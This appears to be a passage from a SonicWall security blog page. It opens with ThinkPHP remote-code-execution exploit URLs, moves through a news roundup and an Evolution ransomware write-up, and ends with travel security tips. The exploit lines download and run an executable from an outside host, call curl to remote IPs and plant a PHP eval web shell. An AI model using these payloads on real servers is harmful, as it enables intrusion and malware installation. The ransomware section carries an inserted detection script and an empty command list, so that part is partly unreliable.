    4. index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(‘http://a46.bulehero.in/download.exe’,’C:/12.exe’);start C:/12.exe
    5. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl 46.30.43.159:81/zz
    6. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
    7. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl 176.32.33.124/zzta
    8. index.php?s=index/\think\app/invokefunction&function=assert&vars[0]=${@print(eval(phpinfo().fputs(fopen(‘lx.php’,’w’), Base64_decode(‘Q25sdVh1bjw/cGhwIEBldmFsKCRfUE9TVFsnbHgnXSk7Pz4=’))))}

Fix:

Upgrade to ThinkPHP version 5.0.23 or 5.1.31 to resolve the issue.
If you use a content management system based on ThinkPHP5, it is likely affected by this vulnerability.

Vendor advisory link: https://blog.thinkphp.cn/869075

SonicWall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13955 ThinkPHP Remote Code Execution
  • IPS: 13965 ThinkPHP Remote Code Execution 2
  • WAF: 1689 ThinkPHP Remote Code Execution

Cyber Security News & Trends – 12-21-18

Quantum Cryptography, Malware spreading through the cloud, and Fortnite making teenagers a lot of money; SonicWall has collected and compiled this week’s best cybersecurity stories, just for you.


SonicWall Spotlight

CEO Outlook: Five Questions on 2019  – CRN.com

  • SonicWall CEO Bill Conner gives his five predictions for 2019; from the biggest market opportunities to his thoughts on why staying up-to-date will be key for Channel Partners. He also predicts that 2019 will be the year of the SonicWall Capture Cloud Platform.

SonicWall Increasing Local Partner Support Across EMEA – Computer Weekly

  • SonicWall celebrates key EMEA milestones including the hiring of industry-leading talent and the opening of three new offices in the UK, Spain, and the UAE.

Quantum Cryptography: The Next-Generation of Secure Data Transmission – Information-Age

  • With SonicWall threat data showing an increase in encrypted threats throughout 2018, Information Age speculates that quantum cryptography could be the future of encryption.

Cyber Security News

Public Clouds: Fertile Ground to Spread Malware – Security Boulevard

  • A general trust in cloud services is leaving an easy entry point open for threat actors to spread malware. Researchers have already found browser hijacker adware Linkury making its way across Microsoft Azure.

Hackers Have Earned $1.7 Million so Far From Trading Data Stolen From US Gov Payment Portals – ZDNet

  • Click2Gov, a US government self-service payment system owned by Superion, was hit by a data breach in September 2017. Security researchers are estimating that the hackers have earned at least $1.7 million to date selling the information on the Dark Web.

Google Finds Internet Explorer Zero-Day Exploited in Targeted Attacks – Security Week

  • Microsoft released a patch for Internet Explorer fixing a dangerous zero-day bug. SonicWall Captures Labs also issued a signature to provide protection.

Fortnite Teen Hackers ‘Earning Thousands of Pounds a Week’ – BBC

  • With Fortnite estimated to have earned more than £1 billion through selling in-game “skins” there is a growing black-market, often run both by and for very young teenagers.

Irish Data Authority Probes Facebook Photo Breach – Security Week

  • A GDPR investigation has been launched in Ireland after it was revealed that up to 6.8 million users may have had their photos exposed to third party apps. A fine of up to four percent of annual global turnover can be issued to a corporation if they are found to be in breach of GDPR.

New Malware Pulls Its Instructions From Code Hidden in Memes Posted to Twitter – Tech Crunch

  • Researchers have found a type of malware that appears to be activated by memes on Twitter. The good news for those who can’t resist a link to a laugh is that it still looks to be in a testing stage and may never be released.

NASA Discloses Data Breach – ZDNet

  • NASA confirmed a data breach in October 2018 in which a third party gained access to personal data, including Social Security Numbers, of current and former employees. No missions are believed to be jeopardized by the hack, but the investigation into the incident will “take time.”

The Nightmare Before Christmas: Cybersecurity Risks for Children’s Toys – EURACTIV (Europe)

  • As the Internet of Things enters toy manufacturing, a host of problems is coming with it: open Bluetooth connections, cheap manufacturing standards, and cybersecurity laws that cannot yet be effectively applied.

In Case You Missed It

Evolution Ransomware actively spreading in the wild.

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of Evolution Ransomware [Evolution.RSM] actively spreading in the wild.

Evolution encrypts the victim's files with a strong encryption algorithm and demands a fee before the victim can get them back.

Contents of the Evolution ransomware

Infection Cycle:

The Ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\(_H0W_TO_REC0VER_[Random].html
    • %App.path%\(_H0W_TO_REC0VER_[Random].txt
    • %App.path%\(_H0W_TO_REC0VER_[Random].lnk
    • %App.path%\[File Name].[Random]
    • %Userprofile%\Desktop\(_H0W_TO_REC0VER_[Random].html
      • Instructions for recovery

Once the computer is compromised, the Ransomware runs the following commands:

The Ransomware encrypts all the files and appends a random extension, such as .hAOrGb, to each encrypted file's name.

After encrypting all personal documents, the Ransomware displays the following web page, which states that the computer's files have been encrypted and instructs the victim to contact the developer for unlock instructions.
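The two artefacts the write-up describes, the _H0W_TO_REC0VER_[Random] notes and user files renamed with a random extension such as .hAOrGb, are enough for a quick host triage. The script below is an added example, not SonicWall's code: it walks a directory tree, flags both artefact types, and only calls the host infected when a note and at least one renamed file are both present. The "random extension" heuristic (five to eight letters, mixed case, not a common extension) and the optional leading "(" on the note name are assumptions made here from the file list above; the sample tree it builds is constructed for the demonstration.

```python
"""Triage scan for Evolution ransomware artefacts (added example)."""
import os
import re
import tempfile

# Ransom note pattern from the file list: _H0W_TO_REC0VER_[Random].{html,txt,lnk}.
# The list shows a leading "(" on the note names, so accept it as optional.
NOTE_RE = re.compile(r"^\(?_H0W_TO_REC0VER_[A-Za-z0-9]+\.(?:html|txt|lnk)$")

# The observed extension .hAOrGb is six mixed-case letters. Treating any
# 5-8 letter mixed-case extension that is not a known type as "random"
# is this example's heuristic, not something the write-up states.
RANDOM_EXT_RE = re.compile(r"^\.(?=[A-Za-z]*[a-z])(?=[A-Za-z]*[A-Z])[A-Za-z]{5,8}$")
KNOWN_EXTS = {".html", ".txt", ".lnk", ".exe", ".dll", ".pdf", ".docx",
              ".xlsx", ".pptx", ".jpg", ".png", ".zip"}


def classify(name):
    """Classify one file name as 'note', 'encrypted' or None."""
    if NOTE_RE.match(name):
        return "note"
    base, ext = os.path.splitext(name)
    if base and ext not in KNOWN_EXTS and RANDOM_EXT_RE.match(ext):
        return "encrypted"
    return None


def scan(root):
    """Walk root and collect Evolution artefacts.

    Returns a dict with the note paths, the renamed-file paths, the set of
    random extensions seen and an 'infected' verdict. Requiring both a note
    and a renamed file keeps a single odd file name from raising an alert.
    """
    notes, encrypted, exts = [], [], set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            kind = classify(name)
            path = os.path.join(dirpath, name)
            if kind == "note":
                notes.append(path)
            elif kind == "encrypted":
                encrypted.append(path)
                exts.add(os.path.splitext(name)[1])
    return {
        "notes": sorted(notes),
        "encrypted": sorted(encrypted),
        "extensions": exts,
        "infected": bool(notes) and bool(encrypted),
    }


def build_sample_tree():
    """Create a constructed directory that mimics a hit: ransom notes in two
    folders and renamed documents next to untouched files. Returns its path."""
    root = tempfile.mkdtemp(prefix="evolution_demo_")
    docs = os.path.join(root, "Documents")
    desktop = os.path.join(root, "Desktop")
    os.makedirs(docs)
    os.makedirs(desktop)
    sample = [
        (docs, "_H0W_TO_REC0VER_k3Fd9.html"),
        (docs, "_H0W_TO_REC0VER_k3Fd9.txt"),
        (docs, "budget.xlsx.hAOrGb"),      # renamed by the ransomware
        (docs, "photo.jpg.hAOrGb"),        # renamed by the ransomware
        (docs, "readme.txt"),              # untouched file
        (desktop, "_H0W_TO_REC0VER_k3Fd9.lnk"),
        (desktop, "notes.docx"),           # untouched file
    ]
    for folder, name in sample:
        with open(os.path.join(folder, name), "w") as fh:
            fh.write("constructed sample\n")
    return root


if __name__ == "__main__":
    result = scan(build_sample_tree())
    print("infected:", result["infected"], "extensions:", result["extensions"])
    for p in result["notes"] + result["encrypted"]:
        print(" ", p)
```

Point `scan()` at a mounted image or a user profile to get a list of notes and renamed files for the incident record; the distinct extension set is worth keeping, since it tells you whether one or several victims' files are mixed on the same volume.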

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Evolution.RSM (Trojan)

5 Tips to Keep You Cybersecure During Holiday Travel

The holiday season is one of the busiest times of the year for travel, which means it’s also one of the most vulnerable times of the year for travelers’ belongings, including sensitive personal data.

Those looking forward to spending time away from the office and relaxing with friends and family are likely making plans to secure their belongings at home, but what about securing devices and data?

Year-to-date attack data through November 2018 shows an increase in attacks across nearly all forms of cybercrime, including increases in intrusion attempts, encrypted threats, and malware attacks.

Below are some simple ways to consider protecting your cyber assets and have peace of mind during a well-earned holiday break.

  1. Lock Devices Down
    While traveling, lock all your mobile devices (smartphones, laptops, and tablets) with a fingerprint, facial recognition, or a PIN. This is the first line of defense in the event that any of your devices is momentarily misplaced or forgotten.
  2. Minimize Location Sharing
    We get it! You want to share the fun memories from your trip with your friends and family on social media. However, excessive sharing, especially of location data, creates a security threat at home. If you share a photo on a boat or at the Eiffel Tower, it is easy for a criminal to work out that you are not at home or in your hotel room, which leaves the property you left behind open to theft or a break-in. If you must share location data, wait until you have returned home to geotag that selfie from your trip.
  3. Bring Your Own Cords and Power Adapters
    Cyber criminals can plant malware in public places such as airport kiosks and USB charging stations, because a USB port carries data as well as power. If you cannot find a trusted outlet, use your own wall adapter rather than a public USB port, and if you are unsure about the charging area, power your device down before plugging it in.
  4. Disable Auto-Connect
    Most phones have a setting that lets the device automatically connect to saved or open Wi-Fi networks. This is convenient at home, but a threat actor can stand up a rogue access point that advertises a familiar SSID, and an auto-connecting device will join it, opening the door to man-in-the-middle attacks. Disable auto-connect and remove saved network SSIDs from the device before your trip.
  5. Be Cautious of Public Wi-Fi
    Free Wi-Fi access is often offered at coffee shops and in hotel lobbies as a convenience to travelers, but unencrypted (open) Wi-Fi networks should be avoided. Before you connect to a new network, confirm the correct network name and its security settings with staff, and if you must use public Wi-Fi, be extra cautious. Use a VPN to reach your work network, and avoid accessing personal accounts or sensitive data while connected to a public Wi-Fi source.

Cybercrime is Trending up During the Holiday Season

For the 2018 holiday shopping season, SonicWall Capture Labs threat researchers collected data over the nine-day Thanksgiving holiday shopping window and observed a staggering increase in cyberattacks, including a 432 percent increase in ransomware and a 45 percent increase in phishing attacks.

LIVE WORLDWIDE ATTACK MAP

Visit the SonicWall Security Center to see live data including attack trends, types, and volume across the world. Knowing what attacks are most likely to target your organization can help improve your security posture and provide actionable cyber threat intelligence.